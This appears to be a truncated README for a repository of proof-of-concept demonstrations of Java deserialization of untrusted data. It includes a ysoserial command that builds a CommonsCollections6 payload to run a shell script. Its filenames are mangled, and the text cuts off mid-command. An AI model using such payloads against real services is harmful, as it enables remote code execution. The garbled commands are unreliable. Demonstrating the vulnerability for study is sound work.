Some PoC (Proof-of-Concept) about vulnerability of java deserialization of untrusted data
Java Deserialization Of Untrusted Data Here there are practical examples of the - deserialization of untrusted data - vulnerability These pocs use the ysoserial tool to generate exploits Pocs Minimal Example Use OpenJDK 18 cd MinimalExample java -jar /ysoserial-master-v005-gb617b7b-16jar CommonsCollections6 "/tmp/exploitsh">payloadser cp /exploit